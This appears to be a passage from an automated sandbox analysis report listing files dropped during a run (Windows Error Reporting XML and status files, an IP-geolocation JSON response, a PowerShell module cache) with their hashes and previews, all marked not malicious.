                                                      SHA1:527C74F8390BE88A68019F661EBE2B80A50B6193
                                                      SHA-256:A52A95CC062CDCB3101233AF209197D4303BD3438EF761CC350EFA4C08C10CD5
                                                      SHA-512:C2D2FB0C896BD846A336FBB1FA41F2F9F5341601E9CEF8724EE655BB2341A970893B1FEEBE0704F0F72A7C0EBD05DC590E8BD222EA225CCE2A88B025FECF5445
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER45B.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.677821736043687
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJqA6zg6YB16V7gmfUBpxr89b+esfjGqm:R6lXJ96zg6YD6pgmfUy+dfjC
                                                      MD5:B6E6B9FD368B9EA48EF5ED6BC0AE2955
                                                      SHA1:AFA5A56EE07625E622198FEE2C510C6944DC9BAB
                                                      SHA-256:5EFEA4BC449A5A1CB976B884B42599A167709A03CF64B132983FFB519CB7E55E
                                                      SHA-512:EBDD8E63928E50EDFD819A0C67940B84D51418E4D8014BD5E3702C790669095FCF127967594185EB2AE7DC5F72D7901E2E4CB9942E9DDF5D19F4F48DA21D56CC
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.1.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER48B.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.430438215818508
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYjYm8M4JTHFLf+q87en7I3dBxd:uIjfKI7Jx7V3JhfFk3dBxd
                                                      MD5:5DFBEE6C2E9ABCA54AA1C29B1EEF3733
                                                      SHA1:CEFA32121A35C4B5D40465437E88A30C35409650
                                                      SHA-256:04B3DBFFE1780E321D1688D4FCCD24D40E233258DAFB897698753DA3A0686C9E
                                                      SHA-512:27B9352FAF593AD695676F58AD8C28AAC70321E4C6C04886DC9C9B2F78B0C9E0530EBFDE4368758509997386005DD5CEB86AE28E15F79C08177B2714214DABF7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF008.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.6800867693355417
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJCe6ig6YBV6FgmfUBpx189bxUsfR7m:R6lXJb6ig6Yj6FgmfUMxHfQ
                                                      MD5:72D3424222573B04032C429F91667046
                                                      SHA1:29C1D4A77E54EB80777C8D0317E294CAB1D8673D
                                                      SHA-256:727513E26AA32154CDC103A428DB99E6794913F3596FA4874E2472F0D86ADC22
                                                      SHA-512:C8E50E50B07E62D455754CCC153E249DDD42963BDD0546A4C21DA3E7B89B6EDC554AD05F1DCE56FF8ED02FDC9DB59FB27848D3F52DDE2E6EC0A675F7004D6947
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.8.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF017.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.681155915691615
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJCj6Ha56YBY6FgmfUBpxZ89bxhfsfr7m:R6lXJm6HU6YO6FgmfUoxhEf2
                                                      MD5:CD82A3F5255EACCF95AA264AEEF47FD4
                                                      SHA1:BD9B9F5D8C224225475A049BE90FCF5E4B242914
                                                      SHA-256:0C4785A9FCE37235ABFA1A72C4A044A6ACC429AE08294237DA6DBBF025788337
                                                      SHA-512:71154FE91FD5008AB307BB36ED07D4FAF82B8F52016C1B441EF9B727ADBFC8081798FFDD95D6C748452F6F3FB43AC60D561E8351FFFE3657E960304779EE5D91
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.5.2.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF037.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.432040121920472
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VY9Ym8M4JTHFZ+q87Y7I3dBYd:uIjfKI7Jx7VZJH1k3dBYd
                                                      MD5:6CE75B8FBD9CFDCC29601C2C5A20C498
                                                      SHA1:724DD9CC594C090E539F53B43100C3CC7A55F2D7
                                                      SHA-256:75A2162AC18EE0402F7A5AC9AE5281071E1E7C6DB5E8CC7479F47E20B9D07D14
                                                      SHA-512:13534A3D96CE7B834DA5A09C59F9CCC4DAE3DA10CD79D973773B99A21DDB3FF45D650BEB65E0200D101E7EE249011BAA134FFBD44BEAA02917A0BD6B6A6212E0
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0B4.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8254
                                                      Entropy (8bit):3.681832557171785
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJpI26aK6YBQ6pgmfUBpxu89bxrsfI7m:R6lXJpp6aK6Ym6pgmfUZxwfp
                                                      MD5:8A9607551498E81EE2D50D394231ABD2
                                                      SHA1:CD423A7CEA243041BC5D4A8DBC1047A0F49D6A25
                                                      SHA-256:EB6270C3EBFB31C7EDF206EC5C7494DF9044D2CDE8BC96045E9A9B189CA3828E
                                                      SHA-512:694C719A75F80D1D416B7FBC8D652C22289149A51FA6B405E7628C1E6FAFFD48780CAC42C579280286B9E6D862225076D2BC8DF75C6C91C4AB58CAE6273AF3D3
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.9.6.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0F4.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4564
                                                      Entropy (8bit):4.431137685970198
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsMJg77aI9L4WpW8VYLYm8M4JTHF++q87b7I3dByd:uIjfKI7Jx7VDJAik3dByd
                                                      MD5:97BF9B7587BE9E2918C189647C396BE0
                                                      SHA1:8666ABAFEFF711954C6DFE86F7C050030AF5EE26
                                                      SHA-256:F59029B95D9A7D7ECE4B297880853CE0A8EDBD84DD0B198F6089E3E08D94DF88
                                                      SHA-512:85140ADD992A98799602C9D9A639FC9274E3A3BD65D1DBDEFCE587D1691A7B5F374006AE223808CAF736A6B1B181751EDA20D08145D66DC50CCB941BAEDCB431
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296447" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):961
                                                      Entropy (8bit):5.00769637274414
                                                      Encrypted:false
                                                      SSDEEP:12:tkEQnd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qPdRNuKyGX85JvXhNlT3/7SxDWro
                                                      MD5:BB19280E017D2F9A45F96479794EDA2B
                                                      SHA1:0B90C47DC19AE285F7F4BA6557174D29827BFE44
                                                      SHA-256:BA2C6ED473707347D40A4ED1B317325A0B78016A36B2A6A9DA43EB2CF63B9046
                                                      SHA-512:52B868D2AA5E0C867E7EA7D81A7113FF5B5B39068B4543D113691B39EDD05FD8A1D57F446FE62083247933C347698193CCB72A78732F7E3319736CD5326C6F63
                                                      Malicious:false
                                                      Preview:{. "geoplugin_request":"102.129.152.220",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.838950934453595
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                      C:\Users\user\AppData\Local\Temp\WER92C.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2387787200195954
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguWu0Q10Q0o0Qgl0QX40Qn0QfwNagWXQ+szeuzSzbxGQI5Uhms:pjle+ugrlooeyOkNKrF
                                                      MD5:E0FA4F7E2A5AEA2A18DEBBE8A352BE9E
                                                      SHA1:F2AD896B1401A0E70DB7FE8C6F2E1E4251D05B1F
                                                      SHA-256:444D5DF2BA8DAFF6ABC687C2F29F580C2111DC4B055F0C47C9368A104AD5E830
                                                      SHA-512:63C2C530F1AF7CFFB111A0F4C5937ADFCEF3AE20902320A8B20B56881A559EDD467BDA6A55ACC7975D1E721EDFC9094B8B0D55F383A69E2FEBE4D78BA162AB3E
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.7.3.7.4.1. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WER98A.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2378972684608756
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWk0QN0Qz0QgW0QXr0QE0QJPrgjX5dszeuzSzbxGQI5UhmLsI:pgle+u0enoeyOkNKW
                                                      MD5:8FDEC79DBB1CC1ED113873375CFF78B3
                                                      SHA1:87127A0A05732E88ADB67344FAF2CE43C1E2349D
                                                      SHA-256:96BD311AFB80D7C63DF583CEC9EB23FB249AD2CE2B493A55BB38268592274F67
                                                      SHA-512:B7EA8E45C486D62EA9517C2EC42E5ECDDBF43DE17704C974EDFDE9AF469174181B85BD276A5FC43E19D93BC2AF397E7FA22468DB5E586D42B5A314D19ACD7A08
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.1.0.8.3.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WER9D8.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2369759790525285
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWT0QU0Q00QgS0QXz0Qt0QATNtgjXokwszeuzSzbxGQI5zmxq:pgle+u3cfwoeyOkNR
                                                      MD5:F35A0C4AC204AE3BA51A168D0B3F80DE
                                                      SHA1:80BFFA90B21A1BE0B73B32947A1D50CD9039EECA
                                                      SHA-256:31187DB8DD11005EBC8A1C5D733E1023FB65C7B2FD61157843A70547CBC97598
                                                      SHA-512:55C52B9D0F6CD4958D9792037A1CF912C6C93854F684CB8D4388AB13FF5AB7321770AACFF2A0C2D4300A016118A68ED3FEB94630D72F9153257FD581AE7ED5DC
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.3.9.9.2.2. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WERE018.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.239799588279947
                                                      Encrypted:false
